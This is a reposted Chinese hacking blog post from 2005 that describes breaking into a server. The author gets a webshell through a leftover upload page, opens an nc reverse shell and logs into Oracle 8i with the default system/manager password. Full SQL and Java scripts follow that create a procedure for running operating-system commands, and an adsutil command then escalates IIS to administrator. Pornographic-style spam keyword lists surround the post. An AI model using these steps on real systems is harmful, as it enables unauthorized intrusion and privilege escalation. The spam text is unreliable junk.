国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關(guān)注微信公眾號(hào)

利用ORACLE的system帳戶默認(rèn)口令提升權(quán)限
2005-12-17   

近日,偶到一主機(jī)上逛了一圈 主機(jī)的配置 還算是安全 偏偏一個(gè)比較隱藏的目錄下 殘留一upfile.asp,結(jié)果輕輕松松的得到一webshell接著在主機(jī)上逛了逛,拿出superscan從外面掃了下 只開(kāi)放了80端口 從user\程序目錄里 發(fā)現(xiàn)有一快捷方式firecontrol 好象是某款硬件防火墻的控制臺(tái)?EBSHELL下檢測(cè)了下 開(kāi)放的服務(wù) 發(fā)現(xiàn)一般的可提權(quán)的方法 都不可行 無(wú)SERV-U等等 主機(jī)的補(bǔ)丁也是打到了最新.

試了下,傳了個(gè)NC上去 反連接得到一SHELL 這下比在老兵的管理器里舒服多了在C盤(pán)下看到一目錄 oracle 看了下C:\oracle\ora81\network\ADMIN\tnsnames.ora文件 確定了主機(jī)的服務(wù)名xxx 看了下版本 oracle 8i 用數(shù)據(jù)庫(kù)連接器 Provider=MSDAORA.1;Password=manager;User ID=system;Data Source=xxxx 試了下默認(rèn)的system帳戶 密碼manager結(jié)果真的就連接到了本地的oracle服務(wù)這下好了 oracle的system帳戶 就像是mssql下的sa 我們來(lái)通過(guò)他來(lái)提升權(quán)限
馬上編輯了幾個(gè)腳本
1.sql
create or replace and compile
java source named "Util"
as
import java.io.*;
import java.lang.*;
public class Util extends Object
{
public static int RunThis(String args)
{
Runtime rt = Runtime.getRuntime();
int rc = -1;
try
{
Process p = rt.exec(args);
int bufSize = 4096;
BufferedInputStream bis =
new BufferedInputStream(p.getInputStream(), bufSize);
int len;
byte buffer[] = new byte[bufSize];
// Echo back what the program spit out
while ((len = bis.read(buffer, 0, bufSize)) != -1)
System.out.write(buffer, 0, len);
rc = p.waitFor();
}
catch (Exception e)
{
e.printStackTrace();
rc = -1;
}
finally
{
return rc;
}
}
}
---------------------------------------
2.sql
create or replace
function RUN_CMD(p_cmd in varchar2) return number
as
language java
name 'Util.RunThis(java.lang.String) return integer';
-------------------------------------
3.sql
create or replace procedure RC(p_cmd in varchar2)
as
x number;
begin
x := run_cmd(p_cmd);
end;
---------------------------------
保存在c:\下
然后用反連接得到的shell運(yùn)行 sqlplus system/manager@xxx
然后在 再來(lái)執(zhí)行腳本
SQL>@C:\1.sql
SQL>@C:\2.sql
SQL>@C:\3.sql
看到JAVA 已創(chuàng)建 函數(shù)已創(chuàng)建 過(guò)程已創(chuàng)建
接著我們繼續(xù)
SQL> variable x number;
SQL> set serveroutput on
SQL> exec dbms_java.set_output(100000);
SQL>grant javasyspriv to system
看到授權(quán)成功
接著我們就可以來(lái)執(zhí)行系統(tǒng)命令了 我想 先把ASP.dll加入特權(quán)一組
SQL>exec :x := RUN_CMD('cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "c:\winnt\system32\inetsrv\asp.dll" ');
看到過(guò)程已經(jīng)成功完成 這個(gè)時(shí)候我們重新登陸我們的webshell 他已經(jīng)具有admin權(quán)限了
接著 再用NC返回一個(gè)shell 已經(jīng)是管理權(quán)限的了 我們可以做我們想干的事了 因?yàn)檫@個(gè)主機(jī)有防火墻 過(guò)濾了除80以外的端口 所以不好做圖形的后門(mén) 只有留下一有權(quán)限的webshell到此 已經(jīng)提權(quán)成功咯.
上次看到一篇文章里說(shuō) 還有種 可以利用msvcrt.dll調(diào)用system()函數(shù)執(zhí)行系統(tǒng)命令 結(jié)果找了很多資料 都沒(méi)找到 如果哪位高手有這方面的資料 希望你可以 發(fā)布出來(lái) 共享一下


熱詞搜索:

上一篇:mssql中public和db_owner權(quán)限下拿到webshell或者系統(tǒng)權(quán)限
下一篇:利用IIS最大連接數(shù)實(shí)現(xiàn)網(wǎng)站DOS

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
亚洲福利精品| 午夜精品久久久久影视| 欧美调教视频| 欧美午夜寂寞影院| 国产日韩专区在线| 亚洲黄色片网站| 亚洲视频 欧洲视频| 久久精品国产久精国产一老狼 | 美女诱惑黄网站一区| 欧美猛交免费看| 国语自产在线不卡| 亚洲香蕉成视频在线观看| 久久亚洲精品网站| 欧美视频一区二| 亚洲欧洲精品成人久久奇米网| 午夜精品久久久久久久久久久| 久久黄色小说| 国产精品成人观看视频免费| 亚洲国产一区二区a毛片| 久久精品免视看| 国产区在线观看成人精品| 在线亚洲免费视频| 欧美色中文字幕| 一本色道婷婷久久欧美| 欧美精品久久99| 亚洲高清三级视频| 美女在线一区二区| 国内精品模特av私拍在线观看| 亚洲男人第一av网站| 欧美性jizz18性欧美| 99re66热这里只有精品3直播| 欧美成人资源| 亚洲人成网站777色婷婷| 欧美成人蜜桃| 亚洲巨乳在线| 欧美日韩精品一区视频| 99视频在线观看一区三区| 免费观看成人网| 亚洲国产老妈| 欧美日韩精品免费观看视一区二区 | 久久综合成人精品亚洲另类欧美| 国产一区91精品张津瑜| 亚洲欧洲一区二区在线播放| 狠狠色综合网| 久久精品国产99| 一区在线免费| 欧美黄色影院| 一本大道av伊人久久综合| 亚洲激情第一页| 免费中文字幕日韩欧美| 亚洲香蕉伊综合在人在线视看| 久久国产精品久久久| 国产精品一区二区三区久久久| 性欧美video另类hd性玩具| 黄色成人av| 欧美激情欧美激情在线五月| 9人人澡人人爽人人精品| 欧美午夜不卡在线观看免费| 亚洲综合欧美日韩| 国产综合精品| 欧美精品一区在线观看| 亚洲欧美伊人| 亚洲国产精品成人综合| 国产精品日产欧美久久久久| 久久综合五月| 亚洲午夜精品久久| 影音先锋另类| 欧美日韩亚洲系列| 久久激情五月丁香伊人| 亚洲精品欧美日韩专区| 国产模特精品视频久久久久| 欧美大片免费看| 欧美一区二区高清在线观看| 亚洲日本一区二区| 国产一区二区毛片| 欧美视频一区二区在线观看 | 国产午夜精品福利| 欧美成人国产一区二区| 午夜精品久久久| 91久久在线| 韩国成人理伦片免费播放| 欧美日韩精品免费观看视一区二区 | 亚洲韩国青草视频| 国产精品热久久久久夜色精品三区 | 国产一区二区精品久久91| 欧美高清视频| 久久久久久久一区二区三区| 亚洲综合社区| 亚洲免费观看视频| 伊人成人在线| 国产手机视频一区二区| 国产精品三级视频| 欧美日韩一卡| 欧美日韩国产美| 欧美理论电影网| 女女同性精品视频| 麻豆九一精品爱看视频在线观看免费 | 欧美在线不卡视频| 亚洲视频在线播放| 999在线观看精品免费不卡网站| 黄色国产精品一区二区三区| 国产日韩欧美三区| 国内精品亚洲| 国外成人在线视频网站| 国产一区二区三区日韩| 欧美另类videos死尸| 欧美.日韩.国产.一区.二区| 久久免费视频这里只有精品| 欧美一区三区二区在线观看| 欧美亚洲三级| 久久久久久久久久久久久女国产乱| 午夜欧美大尺度福利影院在线看| 亚洲综合视频一区| 欧美中文日韩| 蜜桃av综合| 欧美精品日韩精品| 欧美日韩精品一本二本三本| 欧美视频精品在线观看| 国产精品影视天天线| 国产精品美女久久福利网站| 国产精品久久久久久久久| 国产日韩精品一区二区| 国产一区二区看久久| 18成人免费观看视频| 亚洲人成网站在线播| 中文日韩在线| 亚洲午夜视频在线| 久久久久99| 老鸭窝亚洲一区二区三区| 美女在线一区二区| 欧美性色aⅴ视频一区日韩精品| 国产亚洲一区在线| 亚洲国产成人91精品| 亚洲中无吗在线| 久久综合给合| 国产精品久久9| 亚洲福利视频网| 亚洲欧美日韩国产一区二区| 老妇喷水一区二区三区| 国产精品极品美女粉嫩高清在线| 在线看国产一区| 一区二区免费在线观看| 欧美在线视频全部完| 欧美日韩精品福利| 激情视频一区| 亚洲欧美日韩精品综合在线观看| 久久一二三区| 国产精品美女久久久久久2018 | 国产亚洲综合在线| 亚洲日本理论电影| 欧美一级夜夜爽| 欧美亚一区二区| 在线免费观看欧美| 先锋资源久久| 欧美私人网站| 亚洲靠逼com| 久久五月激情| 国产精品爽爽ⅴa在线观看| 亚洲精品视频在线播放| 久久精品国产亚洲5555| 国产精品亚洲综合一区在线观看| 亚洲精品一区久久久久久| 久色成人在线| 伊大人香蕉综合8在线视| 欧美一区二区三区免费大片| 欧美视频精品在线| 在线天堂一区av电影| 久久精品一区蜜桃臀影院| 国产精品午夜春色av| 亚洲永久精品国产| 欧美日韩国产三级| 亚洲欧洲三级电影| 欧美大尺度在线观看| 亚洲电影网站| 欧美成人精品1314www| 亚洲高清视频在线观看| 蜜臀va亚洲va欧美va天堂| 精品av久久707| 久久理论片午夜琪琪电影网| 国内精品久久久久伊人av| 久久久999国产| 在线成人av网站| 欧美国产激情二区三区| 亚洲精品在线电影| 欧美日韩免费一区二区三区| 亚洲精品一区二区三区99| 欧美全黄视频| 亚洲综合社区| 国产一区二区三区无遮挡| 久久久久久一区二区| 亚洲人被黑人高潮完整版| 欧美日韩黄视频| 亚洲在线一区二区| 国产精品永久免费视频| 久久九九电影| 999亚洲国产精| 国产精品一区在线观看你懂的| 久久精品国产第一区二区三区| 在线不卡中文字幕| 欧美区国产区|